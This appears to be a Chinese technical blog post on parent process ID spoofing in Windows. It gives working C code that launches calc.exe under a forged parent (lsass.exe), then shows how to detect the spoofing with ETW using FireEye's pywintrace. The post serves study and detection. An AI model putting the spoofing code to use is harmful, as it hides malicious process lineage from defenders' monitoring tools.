父进程欺骗

在使用CreateProcess函数创建新进程时可以通过UpdateProcThreadAttribute( )函数人为修改STARTUPINFOEXA结构体的lpAttributeList成员变量值来指定子进程的父进程，具体代码如下：

#include 
#include 


int main(int argc, char* argv[])
{
	const char* l_szExePathA = "C:\windows\system32\calc.exe";

	DWORD l_dwParentPid = 588;
	HANDLE l_hParentHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, l_dwParentPid);

	
	STARTUPINFOEXA si;
	ZeroMemory(&si, sizeof(si));
	si.StartupInfo.cb = sizeof(si);

	SIZE_T sizeToAllocate = 0;
	InitializeProcThreadAttributeList(NULL, 1, 0, &sizeToAllocate);
	si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, sizeToAllocate);
	InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &sizeToAllocate);
	// Set the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS option to specify the parent process to use
	if (!UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &l_hParentHandle, sizeof(HANDLE), NULL, NULL))
	{
		printf("UpdateProcThreadAttribute failedn");
		return 1;
	}

	PROCESS_INFORMATION pi;
	ZeroMemory(&pi, sizeof(pi));

	BOOL a=CreateProcessA(NULL,(LPSTR)l_szExePathA,NULL,NULL,TRUE,EXTENDED_STARTUPINFO_PRESENT|CREATE_NEW_CONSOLE,NULL,NULL,(LPSTARTUPINFOA)&si,&pi);
	CloseHandle(pi.hProcess);
	CloseHandle(pi.hThread);

	DeleteProcThreadAttributeList(si.lpAttributeList);
	HeapFree(GetProcessHeap(), HEAP_NO_SERIALIZE,si.lpAttributeList);

	return 0;
}

实际效果如下图。parent.exe(pid:3960)进程创建了calc.exe(pid:2276)进程，进程浏览器实际显示lsass.exe(pid:588)是父进程。

可以使用微软的事件追踪来确定是否使用了父进程欺骗。这里使用火眼在github上面的一个python3项目，具体代码如下：

import sys
import time
import etw

def some_func():
    # define capture provider info
    providers = [etw.ProviderInfo('Microsoft-Windows-Kernel-Process', etw.GUID("{22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716}"))]
    # create instance of ETW class
    job = etw.ETW(providers=providers, event_callback=lambda x: print(x))
    # start capture
    job.start()
    # wait some time
    time.sleep(10)
    # stop capture
    job.stop() 

def main():
    f=open("D:\a","w")
    old=sys.stdout
    sys.stdout=f
    some_func()
    sys.stdout=old
    f.close()

if  __name__=="__main__":
    main()

打开输出结果文件，出现3个进程ID，分别是：

ProcessId:3960、ProcessID:2276、ParentProcessID:588

ProcessId：进程的实际父进程

ProcessId和ParentProcessID的进程ID不同，说明在创建calc.exe(pid:2276)进程时人为指定了其父进程。

结果如下：

https://www.anquanke.com/post/id/168618
https://blog.f-secure.com/detecting-parent-pid-spoofing/
https://github.com/fireeye/pywintrace